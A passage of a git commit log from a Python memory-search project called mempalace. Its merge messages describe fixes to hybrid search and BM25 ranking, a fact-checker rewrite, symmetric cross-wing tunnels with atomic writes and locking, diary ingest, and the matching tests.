   * replaced the fragile ``source_file.endswith(basename)`` reverse-
     lookup in the enrichment step with internal ``_source_file_full``
     / ``_chunk_index`` fields stripped before return, so enrichment
     doesn't silently pick the wrong path when two sources share a
     basename across directories;
   * drawer-grep enrichment now sorts by ``chunk_index`` before
     neighbor expansion, so ``best_idx ± 1`` corresponds to actual
     document order rather than whatever order Chroma returned.

3) Closet-first tests in test_closets.py (``TestSearchMemoriesClosetFirst``,
   end-to-end ``test_closet_first_search_includes_drawer_index_and_total``)
   pinned contracts that the hybrid path now violates (``matched_via``
   went from ``"closet"`` to ``"drawer+closet"``). Rewrote them around
   the new invariant: direct drawers are always the floor, closet
   agreement flips the hit's matched_via and exposes closet_preview.

Verification
────────────

* 805/805 pass under ``uv run pytest tests/ -v --ignore=tests/benchmarks``
  (13 new tests from PR #793 + 5 from PR #795 + 2 new regressions for
  the closet_llm hardening + the rewritten hybrid assertions in
  test_closets.py).
* CI-pinned ruff 0.4.x clean on ``mempalace/`` + ``tests/`` (check +
  format both pass).
* No new deps — closet_llm.py still uses stdlib ``urllib.request`` per
  the PR's "zero new dependencies" promise.

Co-Authored-By: MSL <232237854+milla-jovovich@users.noreply.github.com>
2026-04-13 18:40:36 -03:00
Igor Lins e Silva 1263c3c91e merge: full hardened stack + rewrite fact_checker around actual KG API
Merges the full hardened stack (up through #791 drawer-grep) and turns
fact_checker from "dead code hidden behind bare except" into an
actually-working offline contradiction detector with tests.

## Dead paths the PR body advertised but the code never executed

Both buried by a single outer ``except Exception: pass``:

  * ``kg.query(subject)`` — ``KnowledgeGraph`` has no ``query()`` method;
    it has ``query_entity()``. The attribute error was silently swallowed
    and the entire KG branch always returned ``[]``. Now using
    ``kg.query_entity(subject, direction="outgoing")`` with proper
    handling of the ``predicate``/``object``/``current``/``valid_to``
    fields the real API returns.
  * ``KnowledgeGraph(palace_path=palace_path)`` — the constructor's only
    kwarg is ``db_path``. Passing ``palace_path`` raised TypeError,
    silently swallowed. Now computing the db_path correctly from
    ``<palace>/knowledge_graph.sqlite3``, matching the convention the
    MCP server already uses.

## Contradiction logic rewritten

The previous ``if kg_pred in claim and fact.object not in claim`` only
fired when text used the SAME predicate word as the KG fact — the exact
opposite of the stated use case ("Bob is Alice's brother" when KG says
husband" would NOT have fired). Replaced with a proper parse → lookup
→ compare pipeline:

  * ``_extract_claims`` parses two surface forms ("X is Y's Z" and
    "X's Z is Y") into ``(subject, predicate, object)`` triples.
  * ``_check_kg_contradictions`` pulls the subject's outgoing facts
    and flags two classes:
      - ``relationship_mismatch`` when a current KG fact matches the
        same ``(subject, object)`` pair but with a different predicate.
      - ``stale_fact`` when the exact triple exists but is
        ``valid_to``-closed in the past.
  * Stale-fact detection is now implemented (the PR body claimed it;
    the old code silently didn't implement it).

## Performance fix — O(n²) → O(mentioned × n)

``_check_entity_confusion`` previously computed Levenshtein for every
pair of registered names on every ``check_text`` call. For 1,000
registered names that's ~500K edit-distance calls per hook invocation.
Now we first identify which registry names actually appear in the text
(single regex scan), then only compute edit distance between mentioned
and unmentioned names. Pinned by a test that asserts <200ms on a 500-
name registry with zero mentions.

Also: when *both* similar names are mentioned in the text, we no
longer flag them — the user clearly knows they're different people.

## Shared entity-registry loader

``mempalace/miner.py`` already had an mtime-cached loader for
``~/.mempalace/known_entities.json``. fact_checker had a duplicate
implementation that leaked file handles and ignored caching. Extended
miner's cache to expose both the flat set (``_load_known_entities``)
and the raw category dict (``_load_known_entities_raw``); fact_checker
now imports the latter. No more double disk reads, no more handle leak.

## Tests — 24 cases in tests/test_fact_checker.py

All three detection paths + both dead-code regressions:
  * ``test_kg_init_uses_db_path_not_palace_path_kwarg`` — pins the
    correct KG constructor signature so the ``palace_path=`` bug can't
    come back.
  * ``test_relationship_mismatch_detected`` — the headline example from
    the PR body now actually fires.
  * ``test_stale_fact_detected`` — valid_to-closed triple is flagged.
  * ``test_current_fact_same_triple_is_not_flagged`` — no false positive
    on a still-valid match.
  * ``test_performance_bounded_by_mentioned_names`` — 500-name registry,
    zero mentions, <200ms. Regression for the O(n²) blowup.
  * ``test_no_false_positive_when_both_names_mentioned`` — Mila and
    Milla in the same text is fine.
  * Plus claim extraction, flatten_names shapes, CLI exit code, empty
    text handling, missing-palace graceful fallback, registry-dict
    shape support.

785/785 suite pass. ruff + format clean on CI-pinned 0.4.x.
2026-04-13 18:20:11 -03:00
Igor Lins e Silva e9201fb617 merge: pr/cross-wing-tunnels + rebuild drawer-grep on hardened closet path
Merges the full hardened stack (#788 closets, #789 entity/BM25/diary,
#790 tunnels) and reimplements the drawer-grep feature in a way that
composes with the chunk-level closet-first search instead of fighting it.

## Background

The original PR added "drawer-grep" on top of the pre-hardening closet
code that returned whole-file blobs. My #788 hardening changed that
path to return *chunk-level* hits by parsing each closet's
``→drawer_id`` pointers and hydrating exactly those drawers. That made
the original drawer-grep grep-over-all-drawers logic redundant — the
closet already points at the relevant chunk.

What remained valuable from the original PR was the *context expansion*
idea: a chunk boundary can clip a thought mid-stride (matched chunk
says "here's a breakdown:" and the breakdown lives in the next chunk),
so callers want ±1 neighbor chunks for free rather than a follow-up
get_drawer call.

## Change

New ``_expand_with_neighbors(drawers_col, doc, meta, radius=1)`` helper
in searcher.py:

* Reads ``source_file`` + ``chunk_index`` from the matched drawer's
  metadata.
* Fetches the ±radius sibling chunks in a SINGLE ChromaDB query using
  ``$and + $in`` — no "fetch all drawers for source" blowup.
* Sorts retrieved chunks by chunk_index, joins with ``\n\n``.
* Does a cheap metadata-only second query to compute ``total_drawers``
  so callers know where in the file they landed.
* Graceful fallback to the matched doc alone on any ChromaDB failure or
  missing metadata — search never breaks because expansion failed.

``_closet_first_hits`` now calls this helper and tags each hit with
``drawer_index`` + ``total_drawers``. Hit shape stays consistent with
the direct-search path (both still carry ``matched_via``) so callers
can't tell which path produced a given hit except via that field.

## Tests

6 new cases in TestDrawerGrepExpansion:
* neighbors returned in chunk_index order (not hash order)
* edge case: matched chunk at index 0 — only next neighbor surfaces
* edge case: matched chunk at last index — only prev neighbor surfaces
* edge case: 1-drawer file — returns just the matched doc
* missing/non-int chunk_index metadata — graceful fallback
* end-to-end via ``search_memories`` — closet-first hit carries
  drawer_index, total_drawers, and includes ±1 neighbors

761/761 suite pass; ruff + format clean on CI-pinned 0.4.x.

Merge resolutions: miner.py kept develop's purge+NORMALIZE_VERSION;
searcher.py dropped the old whole-file-blob block entirely in favor of
rebuilding context expansion on top of ``_closet_first_hits``;
test_closets.py took develop's 47-test baseline and appended
TestDrawerGrepExpansion.
2026-04-13 18:08:01 -03:00
Igor Lins e Silva 20255b05be merge: develop + harden cross-wing tunnels for production
Merges the hardened closet/entity/BM25/diary stack from #789 and fixes
five correctness/durability issues in the tunnels module plus the
directional/symmetric design question.

## Design: tunnels are now symmetric

Per review discussion: a tunnel represents "these two things relate",
not "A causes B". The canonical ID now hashes the *sorted* endpoint
pair, so ``create_tunnel(A, B)`` and ``create_tunnel(B, A)`` resolve to
the same record and the second call updates the label rather than
creating a duplicate. ``follow_tunnels`` can be called from either
endpoint and surfaces the other side consistently.

The returned dict still preserves ``source``/``target`` in the order
the caller supplied, so UIs that want to render the connection
directionally can do so.

## Correctness fixes

* **Atomic write** — ``_save_tunnels`` writes to ``tunnels.json.tmp``
  and ``os.replace``s it into place. A crash mid-write can no longer
  leave a truncated file that silently reads back as ``[]`` and wipes
  every tunnel. Includes ``f.flush() + os.fsync`` before replace on
  platforms that support it.
* **Concurrent-write lock** — ``create_tunnel`` and ``delete_tunnel``
  wrap the load→mutate→save cycle in ``mine_lock(_TUNNEL_FILE)``.
  Without this, two agents creating tunnels simultaneously would both
  read the same snapshot and the later writer would drop the earlier
  writer's tunnel.
* **Corrupt-file tolerance** — ``_load_tunnels`` now uses a context
  manager, validates that the loaded JSON is a list, and returns ``[]``
  for any read failure. Subsequent ``create_tunnel`` then overwrites
  the corrupt file via atomic write — no manual recovery needed.
* **Input validation** — new ``_require_name`` helper rejects empty or
  whitespace-only wing/room names with a clear ``ValueError``. Prevents
  phantom tunnels with blank endpoints from ever reaching the JSON
  store.
* **Timezone-aware timestamps** — ``created_at`` / ``updated_at`` now
  use ``datetime.now(timezone.utc).isoformat()``, matching diary ingest
  and other recent modules.

## Tests (12 in TestTunnels)

5 original + 7 regression cases:
* ``test_tunnel_is_symmetric`` — A↔B and B↔A dedupe to one record.
* ``test_follow_tunnels_works_from_either_endpoint`` — symmetric surface.
* ``test_empty_endpoint_fields_rejected`` — validation guard.
* ``test_corrupt_tunnel_file_does_not_lose_new_writes`` — truncated
  JSON treated as empty; next create persists cleanly.
* ``test_atomic_write_leaves_no_stray_tmp_file`` — no leftover ``.tmp``.
* ``test_concurrent_creates_preserve_all_tunnels`` — 5 threads each
  create a distinct tunnel; all 5 persisted (regression for the
  read-modify-write race).
* ``test_created_at_is_timezone_aware`` — ISO8601 has tz suffix.

Merge resolutions: tests/test_closets.py combined develop's hardened
closet/entity/BM25/diary tests with this PR's TestTunnels class.

755/755 tests pass. ruff + format clean under CI-pinned 0.4.x.
2026-04-13 17:50:43 -03:00
Igor Lins e Silva 32d7f4376b merge: develop + harden entity metadata, BM25, and diary ingest for production
Merges develop (closet hardening #826, strip_noise #785, lock #784) and
replaces every sub-feature in this PR with a correct, tested
implementation. Shippable now.

## 1. Real Okapi-BM25 (searcher.py)

The prior `_bm25_score()` hardcoded `idf = log(2.0)` for every term — it
was really a scaled TF, not BM25, and couldn't tell a discriminative
term from a generic one. Replaced with `_bm25_scores(query, documents)`
that computes proper IDF over the provided candidate corpus using the
Lucene smoothed formula `log((N - df + 0.5) / (df + 0.5) + 1)`. Well-
defined for re-ranking vector-retrieval candidates — IDF there measures
how discriminative each term is *within the candidate set*, exactly the
signal we want.

`_hybrid_rank` also fixed:
- Vector normalization is now absolute `max(0, 1 - dist)`, not
  `1 - dist/max_dist` — adding/removing a candidate no longer reshuffles
  the others.
- BM25 is min-max normalized within candidates (bounded [0, 1]).
- Closet path now re-ranks too (was previously returning closet-order
  hits without hybrid scoring).
- `_hybrid_score` internal field stripped from output; `bm25_score`
  exposed for debugging.

## 2. Entity metadata (miner.py)

- Reuses `_ENTITY_STOPLIST` from palace.py so sentence-starters like
  "When", "After", "The" no longer land as entities (regression test
  covers this).
- Known-entity registry is cached at module level, keyed by the
  registry file's mtime — no more disk read per drawer.
- File handle now uses a context manager.
- Truncates the entity LIST (to 25) before joining — never splits a
  name in the middle.

## 3. Diary ingest (diary_ingest.py)

- State file now lives at `~/.mempalace/state/diary_ingest_<hash>.json`,
  keyed by (palace_path, diary_dir). No more pollution of the user's
  content directory.
- Drawer IDs now hash `(wing, date_str)` — a user with personal + work
  diaries on the same day no longer silently clobbers.
- Each day's upsert runs inside `mine_lock(source_file)` so concurrent
  ingest from two terminals can't race.
- `force=True` now calls `purge_file_closets` before rebuild so
  leftover numbered closets from a longer prior day don't orphan.

## 4. Tests (tests/test_closets.py)

Merged this PR's MineLock/Entity/BM25/Diary tests with develop's
hardened Build/Upsert/Purge/Rebuild/SearchClosetFirst tests. Added
specific regression tests for every fix above:
- entity stoplist applies (no "When/After/The")
- entity list capped before join (no partial tokens)
- registry cached by mtime (mock-verified zero re-reads)
- BM25 IDF downweights terms present in every doc (real BM25 evidence)
- hybrid rank absolute normalization stable against outliers
- diary state file outside user's diary dir
- diary wing-prefixed IDs prevent cross-wing date collisions

35/35 closet tests pass; full suite 743/743. ruff + format clean under
CI-pinned 0.4.x.
2026-04-13 17:37:45 -03:00